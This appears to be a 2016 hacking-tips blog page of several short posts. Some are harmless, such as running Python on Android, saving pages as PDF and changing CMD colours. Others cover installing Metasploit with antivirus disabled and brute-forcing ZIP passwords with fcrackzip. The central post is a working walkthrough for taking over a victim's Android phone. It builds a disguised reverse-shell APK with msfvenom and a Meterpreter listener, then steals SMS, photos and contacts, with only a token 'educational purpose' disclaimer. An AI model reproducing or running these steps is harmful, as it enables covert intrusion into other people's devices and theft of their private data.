Tuesday, 4 October 2016

How To Install Metasploit In Windows


Hello everyone, As you may have heard the Metasploit tool is getting popular these days, it is even passing trojans. Most of the attackers now prefer to use Metasploit instead of making a trojan virus. Metasplot is a searching tool, which will give you access to lots of features.

This tool is mostly used on Linux Operating systems, but nowdays it is also available in Windows. You can download it from the official website (but you will need to complete a list of details) or you can download it from here (github). This is a free version of this tool, if you want premium features you will have to buy it.

Once you download Metsploit, you can install it just like any other software on windows, and you are done, but the important thing is that you have to disable your Anti Vius. Because Antivirus treat this tool as Malware, or Virus and it can be removed it so keep in mind to disable your antivirus.

Once you are done, you will get access to features like scanning the website, Ip of a website, admin login etc, but use it a your own risk, and don’t missuse the power of this tool.

How to Recover Android Data Without Using Your PC


Hello everyone, if You lost your data like pictures, messages, contact ? And you want to recover all the lost things? . I will show you how to recover your lost data, with just a simple step.

This is the only application that will work, just download and install it. First time you open the application it will scan for any storage. This means how many storages are you using on your android smartphone (memory card).


Next it will show you all the possible photos, messages, contact that you can recover. It is very simple, just choose the pictures you want to recover and you are done. The recover process will take some time so you better have enough battery on your smartphone.

Notice## In order to recover Contacts or Messages you will need to get rooot access on your phone. Also if this way didn’t work for you, we have covered another way, you can check it out here.


How to Hack Any Android Phone Using Kali Linux or Parrot OS


Hello everyone, In this tutorial i will tell u the best way on how to get into any Android Smart Phone. The tool that we will be using today is called Metasploit. But in this case we are going to use it on Linux, which is way diffrent than the Windows version.

If you don’t have any of the above operating systems (Parrot OS/ Kali Linux),  you can use any of the above system, without installing or using any virtual box.

To get started you will need to have Metasploit tool, which comes as default tool, you can open it by going to Parrot tools, or Applications->Parrot->Exploitations Tools->Metasploit Framewrok->metasploit framework. To open it you will need to enter your root details, and then a new terminal will open.

U have to do like this is showing in this Picture :-

After that, you have to set up the exploitand the payload, which can be done by using this command in the terminal above:

use exploit/multi/handler

Then type this code to set up the payload (In the same terminal you just used the command above)

set payload android/meterpreter/reverse_tcp

Now we need to set up  the local ip address, if you don’t know it, open a new terminal (don’t close the last one) and type:

hostname -I

You should see your ip address right after the code, go to the previous terminal and let’s set up the local host, this is the code:

set LHOST zyx.yxz.xyz

Replace (zyx.yxz.xyz) with the ip address you got on the above step. But in order for this trick to work, you should have configured your port before.
To finish it, type exploit , but don’t close the terminal yet.

Now we have to make an android application so it can be installed on the phone you want to get into. As we all know android uses .apk files, so let’s create one.

Open a new terminal, and type sudo su, which will ask you for root password. Next, create the fake application by using this command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=zyx.yxz.xyz LPORT=4444 R > appname.apk

#Don’t forget to change zyx.yxz.xyz to your local host and the application name in whatever you want.

You can find the application you just created on your home folder. This apk should be installed on the victim phone so you can get into it, this is the only hard part of this tutorial. You should not close the terminal though, once your application is installed on your victim’s phone, it will give you some basic information.

There are many features of this tool that you can use to get sms, pictures, contacts etc, if you want to know any other command just type help in the terminal and you will see all the available codes that you can use.

Note## This trick is just for educational purpose only, we don’t want you to harm any person out there. Use it at your own risk as i am not responsible  what you do.

Sunday, 2 October 2016

How To Install and Use Python In Smart Phones



Hello frineds, Today i will show you how to use Python on your android smart phone. You will be able to run diffrent kind of scripts and edit them. Also you may share it with the community which i don’t think somebody will do it.

To install this application, you will have to just search for the word “Qython” on Google Store, it is free so don’t worry. Once you have downloaded it and installed, you will see a simple dashboard, where you can edit your code, compile it, and save it.

But You have one Question how to run a script in this application from your android system, don't worry there was the answer :-
Well, you will have to copy your code to the application folder. Once you are in, you will see anoher three folders, cache, projects and scripts.

Now let’s say you want to run an Ip Scan script (the file will be called “scanner.py”), find the application folder, and then go to scripts folder. If your folder is empty just paste the scanner.py file, if there is some oher python scripts, don’t worry.

You can access the file called scanner.py by going in your application menu->Programs, as i said above, if your folder script was empty, you will see only scanner.py on the list, if there was any other script, you will find them there.

That was it, very simple right? If you have any other way to use Python on Android comment below.

How to Save Any Website as PDF File

Hello Friends, This time i decided to share a simple trick, (as some of you may know) which will save the entire website as a PDF file. For example if we take this site, weaponarena.blogspot.com after converting, it will look exactly like an simple ebook with tutorials.

Tell me why would we need to convert a website to a PDF file?
Well there are diffrent reasons, let me tell you the ones that look important to me. One you have slow internet connection and it will take some time to load pictures or ads files. Second, no ads. And the third one, you can read it whenever you want.

So lets we start, How to Convert any Website in to PDF File:-

Go to the page you want to save as PDF, for example i am taking the homepage of weaponsarena.blogspot.com  type CTRL+P (i guess you already know this shortuct) and you will be redirected to the print page.

Now here is the trick part , find the Destination in the menu, and that change it to “Save as PDF”, you can see how it will look like from this snapshot,


 Then after changing it in to PDF u have to save after saving the document, the document will open in the PDF file and u can read it check it anywhere and any time. 




How to Crack a ZiP File Password


                                   

Okay Today i am tell u how to Crack a ZIP file Password easily , this is a very popular question, how to recover my files, i forgot my password etc etc. I decided to share this simple cracking method. As you will see in the end of the tutorial it is not very easy if you do it by yourself. What i mean is that, you create the code and not find it ready.

Also something that you have to keep on your mind is that, any hack, crack or trick posted here won’t ast forever, it depends how much it can take. For example, let’s take this tutorial, cracking the ZiP file by using parrot os not tested on (kali linux), you will be able to crack a ZiP file until the developer fix its bugs, then, you will have to create another code or find one.

So let’s get started, you will need Parrot OS for this tutorial (it won’t work on Windows). Copy your file into Parrot Os, and open the terminal (Right click->Open in terminal). To use the tool you have to type fcrackzip but before going to that, you can type frackzip -h for a menu which will tell you what any command does.

                          

Now to get the password, in the same terminal, type fcrackzip -b -c your characters -l 1-9 -u filename.zip

This is what the code means, fcrackzip is used to run the tool, -b stands for bruteforce -c is for characters (you can use numbers also, check the menu for more attacks). You have to replace your characters with numbers or alphabet chars. 1-9 is used to determine the length the password may have. The last thing you have to do is replace the ZiP file name to the one you have.

So in the end the code will look like this fcrackzip -b -c a -l 1-9 -u test.zip, it depends from the password of the file, it will take some time.

Done the password is Cracked.

How to Change CMD Colors

Okay, Today I am show How to change the CMD colour so this is not even a tutorial, but i am doing this just for the followers who are addicted to CMD tricks and tips but they don’t know the basics. I know it is very easy and for some it may be useless.

Anyway, by default the CMD colors are white and the background is black, it may not be somebody favourite color so you may want to change it if you use CMD a lot. In the end of this post you will be able to change the color of the characters and the background.

                  

This is the list of all the possible color you can use:

0 = Black      8 = Gray
1 = Blue         9 = Light Blue
2 = Green     A = Light Green
3 = Aqua       B = Light Aqua
4 = Red         C = Light Red
5 = Purple    D = Light Purple
6 = Yellow    E = Light Yellow
7 = White     F = Bright White

If you want to change the characters color you have to use only one color for example color A or if you want to use number, you have to add 0 before, so it will be color 04.
Now if you want to change the background color use a combination of colors, for example color 4b or color af etc etc.

The preview of color 5b :-